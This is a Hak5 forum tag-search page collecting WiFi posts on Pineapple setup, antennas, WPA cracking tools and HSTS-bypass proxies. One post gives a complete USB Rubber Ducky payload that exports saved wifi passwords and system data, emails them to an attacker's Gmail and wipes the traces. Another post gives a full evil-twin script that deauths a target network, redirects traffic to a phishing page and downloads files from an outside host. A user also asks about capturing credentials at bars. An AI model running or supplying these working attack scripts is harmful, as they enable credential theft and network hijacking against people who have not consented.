Jump to content

Search the Community

Showing results for tags 'Wifi'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...


  • Start





Website URL







Enter a five letter word.

  1. Interesting, if a little short, article on HackerNews today; http://thehackernews.com/2016/01/long-range-wifi-network.html Technically, this could make WiFi pentesting a teenie bit easier. Could certainly pick up/send a signal from futher away, with less equipment, based on the longer waves. Thoughts?
  2. can the YARD stick one also do this? or in the future? if yes is there a youtube video for it? i am not familiar with the YARD stick so that is why i ask http://www.wi-fi.org/news-events/newsroom/wi-fi-alliance-introduces-low-power-long-range-wi-fi-halow sorry if i have post it in the wrong part of the forum
  3. Hi All, I have a question regarding the pineapple but a bit of background would probably be helpful. On a daily basis my job is to hunt down and remove unauthorized WiFi devices people accidentally bring into a very large building. My management has decided they don't want any outside WiFi devices and have put money into technical solutions. I have an enterprise solution that can put me to within 20 meters of the target device. This system will provide me with the MAC address of the offending WiFi device. Once I am in the area, I have a WiFi sniffer that will give me a MAC address readout with it's associated RSSI. Before the pineapple I would wait for the device to broadcast every 30 seconds to 20 minutes depending the device's broadcast frequency. Tracking could take hours. The pineapple really changed the game. When the device connects to the pineapple the hunting time drops fantastically. In the best of scenarios the WiFi device pushes out a steady stream of RF breadcrumbs to the pineapple that allow me to track it down. Here's the problem. There are many devices I've come across that the pineapple cannot ensnare. At last check my pineapple is blasting about 400 different SSIDs to attract attention but the fish aren't biting. Anyway, here's my question. Is there anything I can do to get these devices (mostly phones) to just respond. I have the MAC address. I know I am within range. Is there anything I can do, pineapple or not, to just get these devices to just chirp. I'm not at all interested in connecting. I just need a steady, repeatable response to assist with tracking. I know this may be a bit of an odd application but any ideas would be greatly appreciated. Thanks for any help you can provide. Skinny
  4. I think this is a completely different subject from the previous thread, so forgive me is this is double posting. I found this program called auto-reaver for backtrack: https://code.google.com/p/auto-reaver/ I edited it, changing the mon0 to wlan0mon in one of the scripts, titled "wash". I'm trying to edit it to work with kali 2.0. I did what one of the guys in this thread did: https://forums.kali.org/showthread.php?19641-Reaver-WPS-Locked-Situation-and-Useful-Link/page4 And I quote: I know how to do the first part of that and I did. I did both commands. But I'm lost as to how to change all gawk entries to mawk. I'll research it, but I'm asking because when I look at the script, I don't want to screw up the script as is. I want to edit it correctly. There are also some changes I think need to be made to make this backtrack program work for kali 2.0. Could someone explain what I need to read or how to change this properly to fit kali 2.0? There are various scripts.
  5. I try typing in the ip address with the port, like and clicking enter until the cows come home and it never shows up anymore... At least, almost never. It hasn't shown up in the browser or wifi in several hours. I can't ping the device, even with the ethernet chord connected. I am wondering if a USB-Male-A to USB-A-Male would solve the problem or if I need to fix it over wifi. Ethernet light is on on the pineapple itself.
  6. I was playing around trying to be able to connect to the wifi pineapple via wifi again, and I screwed up my ethernet by accident. The only adapter I can diagnose that has something wrong is ethernet. Here is my network adapters: Here is the error I get when trying to diagnose it: And when I try to fix it as an administrator: Does anyone know if THIS might work? I am scared of trying it: http://answers.microsoft.com/en-us/windows/forum/windows_xp-hardware/how-do-i-replace-my-tcpip-protocol-driver/2d5eaf70-bd3e-40ab-ae11-b6c5110ab8df https://support.microsoft.com/en-us/kb/299357 How do I get ethernet protocol again, or fix whatever the problem is?
  7. So, I want to install the USB packages: root@pineapple:# opkg --dest usb install tmux gpsd gpsd-clients root@pineapple:# opkg install kernel kmod-usb-serial-pl2303 It gives me errors saying it doesn't recognize the command and can't locate the packages when I use "apt-get install". I am a beginner at wireless hacking and I'm just starting to use the WiFi pineapple. It would also be nice if someone had read "Hacking Exposed: Wireless Edition", although not neccessary, since that's where I'm getting these instructions from. I'm trying to do this on kali linux 2.0
  8. I'm sniffing using: tcpdump -i wlan0 -e I'm not receiving any information about what channel or frequency is used. Is this normal for these nics? I've tried to change the channel using ifconfig but to no change. On my laptop i get information like: "6.0 Mb/s 5180 MHz 11a". 12:55:36.413325 8361052374567211200us tsft cfp 0.0 Mb/s 0 MHz Turbo -128dB signal [bit 29] BSSID:ff:ff:ff:ff:ff:ff DA:ff:ff:ff:ff:ff:ff
  9. Here's something I've been thinking about for a long time: you know when you go into a bar, ask for the wifi password and notice that the router has the default user and pass set? How easy if at all possible would it be to somehow sniff that traffic from somewhere else? Maybe it's even possible to automate things like capturing certain types of packages, cookies or even capture some credentials? Maybe I'm way off, I'm a complete rookie in this field. In that case I'd be very grateful if somebody explained why it can't be done! Thanks in advance!
  10. ***WARNING I HAVE HAD TOO MANY CUPS OF COFFEE TODAY IF THIS DOESN'T MAKE SENSE TELL ME**** For a university project, I am attempting to harvest the various AP Beacon frames given off by devices. I set up my Pineapple last night so that when it boots up it starts PineAP, Harvester, and the secure Wi-Fi Ap. I tested it last night, and due to my router having something really wrong with it (Randomly the 5gh and 2.4gh radios will just stop transmitting, which requires me to reboot my router) I checked to make sure that ONLY my cell or my laptop is able to connect to it. Well this morning I am in class, logged into the pineapple and there were ten clients connected to it.... Insert expletives here. I shut it down, and started looking around on how to prevent other devices from connecting to it. In the past the configuration where all my pineapple does was look and not respond worked, now that's not the case. I can't figure out what changed between now and a month and a half ago. Anyone have an idea on what settings I should use to prevent devices from associating with the pineapple? Before you ask, why are doing this on a university campus? IF I can get the data I would like I will post it here.
  11. I am moving into an small house in farm land. 500ft away is where the fiber stops and I am wondering how I could get Wi-Fi to be transmitted to my house. Talked to the neighbors and they are fine if I have a modem in there house. how would I be able to transmit wifi to my house? is there a better way ? budget is no more than 300 or soo . Can it be done ? If so a parts list would help a lot! Can i be able maybe to use a old router or buy a new one not to sure yet. Please help...
  12. Hi, I want to ask, what other programs exist for finding the pass phrase of a WPA handshake besides aircrack-ng and cowpatty. For linux platform, especially server, cpu based. From what I understand, pyrit is GPU based. Whats wrong with aircrack and cowpatty? Well.. I want to use an openSUSE11 server BUT I dont have root rights to install all prerequisites and compile aircrack. Cowpatty compile and works fine, but its single threaded. I know I can break up the wordlist into e.g 4 run four instances, but sometimes it does not recognize the handshake as well as aircrack-ng. Just asking if there are any other alternatives. Thank you
  13. After reading countless threads about SSLSTRIP not working on systems such as Safari, Firefox, and Chrome I wanted to inquire about something that was released at Defcon Asia... SSLSTRIP 2 and DNS2PROXY https://github.com/LeonardoNve/sslstrip2 This is a new version of Moxie´s SSLstrip with the new feature to avoid HTTP Strict Transport Security (HSTS) protection mechanism. This version changes HTTPS to HTTP as the original one plus the hostname at html code to avoid HSTS. Check my slides at BlackHat ASIA 2014 OFFENSIVE: EXPLOITING DNS SERVERS CHANGES for more information. For this to work you also need a DNS server that reverse the changes made by the proxy, you can find it athttps://github.com/LeonardoNve/dns2proxy. Demo video at: http://www.youtube.com/watch?v=uGBjxfizy48 The DNS Proxy I am having a really hard time following the instructions, I've tried to contact the developer for clarification but no luck. Anyone else care to chime in on how to setup dns2proxy? - > Also is there anyone willing to take on the challenge on adding this as an infusion to the pineapple? My understanding is this would allow you to compromise all browsers such as Safari, Chrome, and Firefox? The demo video interestingly enough shows quite vividly proof of concept -- just trying to figure out how to do this? I'm running a few Kali Linux machines, can someone clarify how I'm supposed to setup the DNS proxy? To the ENTIRE Hak5 Team; Thankyou for working on a device that is truly amazing and endless with opportunity. We are only limited by our creativity when it comes to deployment with this awesome device. I took it upon myself to invest in all the bells and whistles that came with the Mark 5. Lets talk about build quality - FIRST CLASS! This thing is scary - To the untrained eye you wouldn't have ANY idea what it is... To the trained idea, the only term that comes to mind is pwned and operated. PineAP: ... so thats what Dogma does -- and thats why karma doesn't work as expected anymore :D -- Soooo many questions on this forum could be answered by watching this regarding Karma.. Chris Haralson https://www.youtube.com/channel/UCK15ED34btB3NZznGIXQuwA This guys videos and guides are first class - aimed at people with my skill sets I really couldn't ask for anything to be clearer. I am anxiously awaiting your future guides and videos.. (*I check back everyday*). My office :D And a snazzy little pic of some pineapples....
  14. Pyrit WPA password cracker updated! Ive been maintaining this project for a while now, please spread the word: https://github.com/JPaulMora/Pyrit Added some extra options and performance improvements.
  15. Nbt Scan is a UI Front End for the nbtscan tool which performs netbios name scanning. Change Log: 1.1 Added ability to clear results Added ability to view routing table Added a link to forum support topic Small tile no longer checks for internet connection A few UI changes Fixed a command injection vulnerability 1.0 - Initial Release ​Ability to use NBT Scan from the web interface Ability to install dependencies from the webinterface Ability to scan other networks rather than just the pineapples network Ability to review and delete previous nbt scans https://www.youtube.com/watch?v=YoUEACISRpw
  16. why don't someone write a book "learn hacking with wifi pineapple" ..in which it should contain how to hack and also how to protect us from getting hacked ,..for beginners
  17. I'm looking for a wifi antenna cable but I'm not sure what type of cable I should purchase. Are SMA and LMR compatible? Are there adapters? What are the parts called that I'm looking for? It's the kind of cable you connect a wireless device to one end and an antenna on the other. I want to run an antenna up a tree in the back 40 and maybe some other stuff. Are wifi cable and TV cable essentially the same except for the connector sizes? The pictures all look the same on Google. Anyway what parts do I need? LMR-200? is that what I'm looking for?
  18. Hallo, I am a student from http://www.kw1c.nl/ I told my friend who works at my school as an IT that i can use the WiFi Pineapple to download the Open Wifi login page and use it as an Phishing page. Knowing me as an pen-tester and reporting back to him he liked the idea to let me try it out. I have seen the tutorial from Darren Kitchen but what i want to do is slightly different. Tutorial: Hijacking DNS on the WiFi Pineapple - Pineapple UniversityThat i want to know is how to install the downloaded login page into the WiFi Pineapple SD card and change the links in the downloaded page files to link to the files in the SD card. Greetings from The Netherlands
  19. Hello fellow Hak5 fans!!! I recently have just written my first USB Rubber Ducky Payload and thought I would share it. If you spot any errors/improvements let me know . REM Author: Zeta REM Date: 4/5/15 REM Description: This program collects the computer info and wifi passwords of the victim and emails it to attackers gmail. REM------------------------OPEN & HIDE------------------------ DELAY 750 GUI r DELAY 400 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 555 ALT y DELAY 555 ENTER ENTER ALT SPACE STRING M DOWNARROW REPEAT 111 ENTER REM ----------------------COLLECT & DUMP---------------------- STRING set TEMPDIR=%systemdrive%\de-temp ENTER STRING mkdir %TEMPDIR% ENTER STRING cd %TEMPDIR% ENTER STRING netsh wlan export profile key=clear ENTER STRING set > info.txt ENTER STRING cd.. ENTER REM ---------------------------------------------ZIPPING FILE--------------------------------------------- DELAY 450 STRING echo Set objArgs = WScript.Arguments > _zipIt.vbs ENTER STRING echo InputFolder = objArgs(0) >> _zipIt.vbs ENTER STRING echo ZipFile = objArgs(1) >> _zipIt.vbs ENTER STRING echo CreateObject("Scripting.FileSystemObject").CreateTextFile(ZipFile, True).Write "PK" ^& Chr(5) ^& Chr(6) ^& String(18, vbNullChar) >> _zipIt.vbs ENTER STRING echo Set objShell = CreateObject("Shell.Application") >> _zipIt.vbs ENTER STRING echo Set source = objShell.NameSpace(InputFolder).Items >> _zipIt.vbs ENTER STRING echo objShell.NameSpace(ZipFile).CopyHere(source) >> _zipIt.vbs ENTER STRING echo wScript.Sleep 2000 >> _zipIt.vbs ENTER STRING CScript _zipIt.vbs %TEMPDIR% %systemdrive%\de-temp.zip ENTER DELAY 200 REM -----------------------------------EMAIL LOG VIA GMAIL----------------------------------- STRING powershell -command $SMTPServer = 'smtp.gmail.com'; $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587); $SMTPInfo.EnableSsl = $true; $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('USERNAME', 'PASSWORD'); $ReportEmail = New-Object System.Net.Mail.MailMessage; $ReportEmail.From = 'EMAIL'; $ReportEmail.To.Add('EMAIL'); $ReportEmail.Attachments.Add('%systemdrive%\de-temp.zip'); $ReportEmail.Subject = '%computername%'; $SMTPInfo.Send($ReportEmail) ENTER DELAY 100 REM ---------------------DELETE AND END--------------------- STRING RD /S /Q "%systemdrive%\de-temp" ENTER STRING TYPE nul > %systemdrive%\de-temp.zip ENTER STRING DEL /Q %systemdrive%\de-temp.zip ENTER STRING TYPE nul > %systemdrive%\_zipIt.vbs ENTER STRING DEL /Q %systemdrive%\_zipIt.vbs ENTER STRING exit ENTER
  20. hello to the one who is/are reading this, i am looking for a power solution on the wifi pineapple mk5. i have read on this page http://hakshop.myshopify.com/collections/wifi-pineapple-kits/products/wifi-pineapple?variant=81044992 that the mk5 uses between 5-12 volts. since im a newbie when it comes to electricity how many watts would be the minimum (to get the 5 or 12 volts) to get the wifi pineapple mk 5 to work properly?! i have found 2 that i am interested in but need feed back if it is smart to do so or not http://www.amazon.com/ReStore-Portable-Folding-Charger-Carrying/dp/B00FABKX7E/ref=sr_1_77?ie=UTF8&qid=1434471712&sr=8-77&keywords=portable+solar+charger and http://www.amazon.com/Poweradd-Charger-Portable-Foldable-USB-Charged/dp/B00M16DXKK/ref=sr_1_80?ie=UTF8&qid=1434471712&sr=8-80&keywords=portable+solar+charger or if some has a different suggestion for solar power please let me know many thanks in advance
  21. Hi, I am a complete noob to everything ever so just please bear with me. I want to buy myself a basic laptop which will allow me to begin learning to hack - I have a strong knowledge of computers and want to learn Internet security and pentesting properly. I have a £450-£500 budget and I maybe can push it if needed. I want to be running Kali Linux on it and I will be partitioning a drive to get to that. I was hoping for a 15.6" screen, i5, 8gb RAM and a 1TB HDD with as much battery life as possible. I have seen normal laptops with this for £400 so I think I can get this. My real question is if there are any things I will NEED to get me started; for example I know certain wireless cards make pentesting much easier but I don't know which models or which laptops contain them (I was hoping not to buy an external one). I guess if need be I can change a wireless card but I would like to stay away from fiddling with internals. Any suggestions/help would be greatly appreciated. Thanks, MrJaMilne
  22. I'm not really familiar with how the different WiFi technologies work. (a,b,n,g.c...) Would it be possible to get the pineapple to work with 5Gh networks? I realize you probably can't just switch out antennas or something, but I think it's worth asking. If there is nothing I can do to the existing equipment, if I were to attach a card via USB that supports it, would it work? If so, would the infusions work with it, or just stuff through SSH? Thanks
  23. I'm working on an eviltwin infusion for the pineapple but still have a long way to go. So far Im writting an eviltwin script without the pineapple to make sure I get that right. The script still need some work. I need help to improve it. Im writting the script base on this video #touch eviltwin #nano eviltwin (copy & paste script) #chmod +x eviltwin #./eviltwin (This will not setup your mysql database) #!/bin/bash ########################################## # Evil Twin Access Point v0.1 # # # # written by: sithstalker # # not yet tested on wifi pineapple # ########################################## #Downloading www files echo "downloading www files..." DIR1="/var/www/styles" if [ -d "$DIR1" ]; then echo "You already have the eviltwin files..." sleep 2; else echo "Getting the /var/www eviltwin files and creating backup to /var/orig-www" sleep 2; mkdir /var/orig-www && mv /var/www/* /var/orig-www/ cd /var/www && wget http://hackthistv.com/eviltwin.zip sleep 2; unzip eviltwin.zip sleep 2; fi #Killing active processes echo "Killing airbase-ng" pkill airbase-ng sleep 2; echo "Killing dhcpd" pkill dhcpd3 sleep 2; #Getting required informations echo -n "Enter you local ip address and press [ENTER] (e.g. " read lhost echo -n "Enter your wlan interface and press [ENTER] (e.g. wlan0): " read wlan_int echo -n "Enter the subnet for your DHCP scope and press [ENTER] (e.g. " read dhcp_subnet echo -n "Enter the subnetmask for your DHCP scope and press [ENTER] (e.g. " read dhcp_subnetmask echo -n "Enter the broadcast address for your dhcp scope and press [ENTER] (e.g. " read dhcp_broadcast echo -n "Enter the default gateway for your DHCP Scope and press [ENTER] (e.g. " read dhcp_dgw echo -n "Enter the DNS Server for your DHCP Scope and press [ENTER] (e.g. " read dhcp_dns echo -n "Enter the start address of your DHCP scope and press [ENTER] (e.g. " read dhcp_start echo -n "Enter the last address of your DHCP scope and press [ENTER] (e.g. " read dhcp_last echo -n "Enter the SSID you like to use for your Access Point and press [ENTER] (e.g. eviltwin): " read ssid echo -n "Enter the Channel you like to use for your Access Point and press [ENTER] (e.g. 11): " read channel echo -n "Enter the interface name which is connected to the internet and press [ENTER] (e.g. eth0): " read inet_int echo -n "Enter the target Bssid and press [ENTER] (e.g. SI:TH:ST:AL:KE:R0): " read bssid #Setting dhcpd config to /etc/dhcp3/dhcpd.conf echo "setting dhcpd config in /etc/dhcp/dhcpd.conf" sleep 2; #check if there already is a backup directory for the original dhcpd.conf file DIR="/etc/dhcp/orig_conf" if [ -d "$DIR" ]; then echo "You already have a backup directory for the original dhcpd.conf" sleep 2; else echo "You do not have a backup directory for the original dhcpd.conf file... I will create one" sleep 2; mkdir /etc/dhcp/orig_conf fi #check if there already is a backup of the original dhcpd.conf file. If not one will be created if [ "$(ls -A $DIR)" ]; then echo "You already have a backup of the original configuration file in /etc/dhcp/orig_conf" sleep 2; else echo "creating backup of original dhcpd config file to /etc/dhcp/orig_conf" sleep 2; cp /etc/dhcp/dhcpd.conf /etc/dhcp/orig_conf/dhcpd.conf rm /etc/dhcp/dhcpd.conf fi echo "default-lease-time 600; max-lease-time 7200; authoritative; subnet $dhcp_subnet netmask $dhcp_subnetmask { option subnet-mask $dhcp_subnetmask; option broadcast-address $dhcp_broadcast; option routers $dhcp_dgw; option domain-name-servers $dhcp_dns; range $dhcp_start $dhcp_stop; }" > /etc/dhcp/dhcpd.conf #Starting monitor mode on $wlan_int echo "putting $wlan_int into monitor mode. You can check that later by using iwconfig command" sleep 2; airmon-ng stop $wlan_int sleep 5; airmon-ng start $wlan_int sleep 5; ################################################################### #Starting airbase-ng with SSID=$ssid and channel=$channel echo "starting airbase-ng with SSID $ssid and channel $channel" sleep 2; airbase-ng -e $ssid -c $channel -P mon1 & sleep 5; ################################################################### #starting new generated interface at0 and assign ip address echo "starting at0 with ip $dhcp_dgw and subnetmask $dhcp_subnet and create a route for that" sleep 2; ifconfig at0 down sleep 2; ifconfig at0 $dhcp_dgw netmask $dhcp_subnetmask sleep 2; ifconfig at0 up sleep 2; route add -net $dhcp_subnet netmask $dhcp_subnetmask gw $dhcp_dgw sleep 2; #Setup iptables with nat for the new network echo "setting up iptables with nat for the new network" sleep 2; iptables --flush iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain #iptables -P FORWARD ACCEPT iptables -t nat -A POSTROUTING -o $inet_int -j MASQUERADE iptables --append FORWARD --in-interface at0 -j ACCEPT iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination $lhost:80 iptables -t nat -A POSTROUTING -j MASQUERADE #Clear DHCP leases echo "clearing dhcp leases" sleep 2; echo > '/var/lib/dhcp/dhcpd.leases' #creating a symlink to dhcpd.pid #ln -s /var/run/dhcp3-server/dhcp.pid /var/run/dhcpd.pid #start dhcp server and enable ip forwarding echo "starting dhcp and enabling ip forwarding" sleep 2; #dhcpd3 -d -f -cf /etc/dhcp/dhcpd.conf at0 & dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0 echo "1" > /proc/sys/net/ipv4/ip_forward /etc/init.d/isc-dhcp-server start echo $bssid > blacklist mdk3 mon1 d -b blacklist -c $channel
  24. Hello Everyone first post for me and i have a problem with Wifi.what the problem is the in-gated community my aunt is in has a contract with AT&T but they screwed up and didn't run enough lines to all the homes and they said estimated time of repair is within the next 2 years on top of that the contract states no other company can come in and place there lines so she is stuck without internet. but she live on the back wall side and about a football field away there is a time warner hotspot. i can get an account to use that wifi hotspot but i need a device to reach that and connect to it.log into the hotspot and receive the internet and shell it out to multiple PC's or a router in the home threw its RJ45 jack. when i emailed Ubiquiti i was told the PowerBeam M2 and M5 can do just that. so i spent 100 bucks and bought the PowerBeam M2. i have it on top of the roof aimed at the hotspot about 650-700 fetish now the problem is when i connect to the hotspot it says im around 70-90 -dBm around 70 noise. it stays connected for about 4seconds then drops and reconnects right away.i called time warner and the tech says the login auth was working but was getting what is called "Challenge TimeOut" i have the PowerBeam M2 wireless set to " Station " mode with WPA2_AES auth and under the networking part i have had it in "Bridge" mode with DHCP enabled. I Attached 3 images of the PowerBeam M2 GUI settings "Main, Wireless and Networking Tabs ". any help would be great and thank you ahead of time p.s.s sorry ahead of time to grammer and spelling nazi's :-p
  25. Hello everyone. First post on here so bear with me. I am a cyber security student trying to learn to use kali and linux in general, and I have a problem with wifi. I have dual booted Kali with windows 8.1, and I cannot use the internet when I boot into kali. I get an ip address from my router's dhcp, I can ping addresses outside the network, like, but I cannot connect to any web pages. I need to connect while I work on kali for school work. Anybody know whats going on? Thanks in advance.
  • Create New...